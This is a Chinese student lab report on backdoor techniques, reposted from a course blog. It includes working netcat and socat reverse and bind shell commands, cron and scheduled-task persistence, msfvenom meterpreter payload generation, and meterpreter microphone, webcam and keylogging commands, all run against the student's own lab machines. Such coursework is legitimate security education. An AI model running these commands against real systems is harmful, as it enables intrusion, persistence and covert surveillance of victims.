码迷,mamicode.com
首页 > 其他好文 > 详细

20174315黄华健《网络对抗技术》Exp2 后门原理与实践

时间:2020-03-22 13:34:40      阅读:89      评论:0      收藏:0      [点我收藏+]

标签:拍照   等等   art   height   listen   int   sock   防范意识   logs   

1 实验目标

1.1 实验要求

  • 使用nc实现win,mac,Linux间的后门连接
  • meterpreter的应用
  • MSF POST 模块的应用

1.2 实验内容

  1. 使用netcat获取主机操作Shell,cron启动 。
  2. 使用socat获取主机操作Shell, 任务计划启动 。
  3. 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell。
  4. 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 。
  5. 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

三、实验步骤及结果

  (一)ncat

netcat是一个底层工具,进行基本的TCP、UDP数据收发。常被与其他工具结合使用,起到后门的作用。Linux一般自带netcat,"man netcat"或"man nc"可查看其使用说明。

技术图片

 

  Windows中安装ncat,在 课程主页附件中下载ncat.rar解压即可使用。这里笔者下载解压到D盘上。

    1.Win获得Linux Shell

    先查看一下windows端的IP地址(ipconfig)。

 技术图片

 

在windows中下载好netcat后,切换到文件目录,用 ncat.exe -l -p 4315 命令打开监听。

 技术图片

 

 接下来打开Kali,用nc 192.168.1.49 4315 -e /bin/sh 指令来进行反弹式连接。

技术图片

过一会在Windows用ncat.exe -l -p 4320 命令打开,发现已经获得了Linux的shell,可以运行任何的指令。(在这里我用ls作为示例)

 技术图片

 

 

 

2.1.2  Linux获得Win Shell

既然我们的windows可以获取Linux的shell,那当然反过来也成立。

首先,我们要知道虚拟机的IP地址,这里用ipconfig来查看

技术图片

 技术图片

 

在Linux端运行监听指令 nc -l -p 4315,然后就在windows上进行反弹连接 ncat.exe -e cmd.exe 192.168.54.128 4315。

这样一来,Linux就获得了windows的shell。

可以看到命令行界面,还可以执行windows的命令(我用ipconfig为示例)

技术图片技术图片

 

 

 

2.1.3 nc传输数据

windows运行监听指令

技术图片

 

 

 linux与windows建立连接;

连接建立成功后,可以进行字符数据的传输了

技术图片

 

 

 

2.2  Meterpreter

Meterpreter是一个用来生成后门程序的平台,具有强大的功能,特别是其socks代理,简直就是内网渗透测试神器。

后门就是一个程序。

传统的理解是:有人编写一个后门程序,大家拿来用。

后来有一些牛人呢,就想编写一个平台能生成后门程序。这个平台呢,把后门的基本功能、扩展功能、编码功能、运行平台以及运行参数,全都做成零件或可调整的参数。用的时候按需要组合,就可以生成一个可执行文件。

典型的平台就包括有:

  • intersect
  • Metaspolit的msfvenom指令
  • Veil-evasion

任务一:使用netcat获取主机操作Shell,cron启动

Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。

1.在windows中开启监听,使用 ncat.exe -l 4315 命令监听4315端口

2.crontab指令增加一条定时任务,"-e"表示编辑。并选择编辑器3,在底行插入10 * * * * /bin/netcat 192.168.1.156 4315 -e /bin/sh,即在每个小时的第10分钟反向连接主机的4315端口。 技术图片

 3.保存、退出后配置即生效。可以通过"crontab -l"来查看,"-l"表示list。10分钟后执行指令,可以发现已经获得了shell。

技术图片

 

 

 

任务二:使用socat获取主机操作Shell, 任务计划启动

1.把张博同学发给我的socat压缩包下载下来并解压好。

2.在Windows系统下,打开控制面板->系统和安全->管理工具找到任务计划程序,点击创建任务。

技术图片

 

 

 

3.点击触发器选项卡,选择新建,然后将开始任务设置为工作站锁定时。

技术图片

 

 

 4.在操作选项卡,点击新建,在“程序或脚本”中选择socat.exe文件的路径,添加参数中填写tcp-listen:4315 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口4315,同时把cmd.exe的stderr重定向到stdout上;

技术图片

 

 

 5.创建完成之后,键入windows+L锁定计算机再次登录,让任务开始执行。点击任务计划程序库,可以看见这个被我命名为4315的计划正在运行。

技术图片

 

 

 6.然后在Kali环境下输入指令 socat -tcp:192.168.1.156:4320,可以发现已经获得了cmd的shell,看到了命令行界面(使用了ipconfig来验证)。技术图片技术图片

 

 

 

任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.生成4320_backdoor.exe,复制到Win。

在Kali中输入命令如下(由于是在Linux中生成后门,所以此处的ip地址是Kali的ip地址)kali的ip地址如下

技术图片

 

 

 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1=4315 -f exe > 4315_backdoor.exe技术图片

 

 

 技术图片

 

 

 

2.在Windows下执行 ncat.exe -l 4315 > 4315_backdoor.exe,使被控主机进入接收文件模式。

3.在kali中执行nc 192.168.1.49 4315 < 4315_backdoor.exe,将生成的后门程序传送到主机上。

4.MSF打开监听进程。

Kali中重新打开一个终端,输入msfconsole进入msf控制台

依次输入:

  • use exploit/multi/handler //使用监听模块,设置payload

  • set payload windows/meterpreter/reverse_tcp //使用与生成后门程序时相同的payload

  • set LHOST 192.168.171.128

  • set LPORT 4320

  • exploit //设置完成,开始监听

  • 技术图片

     

     

     

任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权;

    1.音频

    保持任务三的状态,输入 record_mic 可以截获一段音频。

技术图片

 

 

 技术图片

 

 

 

2、摄像头

输入指令webcam_snap 使用摄像头拍照。

 技术图片

 

 

3、击键记录

使用keyscan_start 指令记录下击键的过程,keyscan_dump 指令读取击键记录

技术图片

 

3 实验思考与心得

3.1 基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

浏览网站所附带的软件,或者在不正规的下载网站下载软件

(2)例举你知道的后门如何启动起来(win及linux)的方式?

windows:自启动。 linux:输入shellcode。 

(3)Meterpreter有哪些给你映像深刻的功能?

可以通过反向链接,获取所有执行了含后门的可执行文件的主机shell操作权,从而得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息等等。

(4)如何发现自己有系统有没有被安装后门?

查看开机自启动项、任务计划程序中是否有可疑程序;安装专门的杀毒软件,实时防护;查看本机端口,判断是否有被异常开放的端口等等。

2、实验体会

这次实验趣味性很强,通过学习老师教程以及学长学姐的博客,基本都能够完成实验。在这次实验中,我学会了利用后门程序对主机进行注入攻击,学会了使用netcat、socat、meterpreter等,虽然内容简单,但我已经基本了解后门的基本原理。在今后的学习中,我将会进一步深入研究后门的各种理论知识。

本次实验也让我更加了解了一些网络攻击的手段,加强了网络安全防范意识。

2、实验遇到的问题

问题1:kali没有联网

技术图片

 

 

实验开始时启动Kali之后,莫名其妙发现连不上网,通过与同班同学的交流得到解决方法,最后在他的指导下通过虚拟网络编辑器还原默认设置之后,重启KALI成功连上网。

技术图片

问题2:多个程序使用导致失败

技术图片

 

技术图片

 

 解决方法:最简单的推到重做,捂脸.JPG。

 

 问题3:kali没装有socat

技术图片技术图片

 

 我的共享文件夹不知道咋的用不了,网上找发现和自己的情况也不一致。

最后的解决办法:把socat压缩包放到我的邮箱,然后在kali的搜狐浏览器登录邮箱下载(土办法,捂脸.jpg)

 

技术图片

20174315黄华健《网络对抗技术》Exp2 后门原理与实践

标签:拍照   等等   art   height   listen   int   sock   防范意识   logs   

原文地址:https://www.cnblogs.com/hhj20174315/p/12544448.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!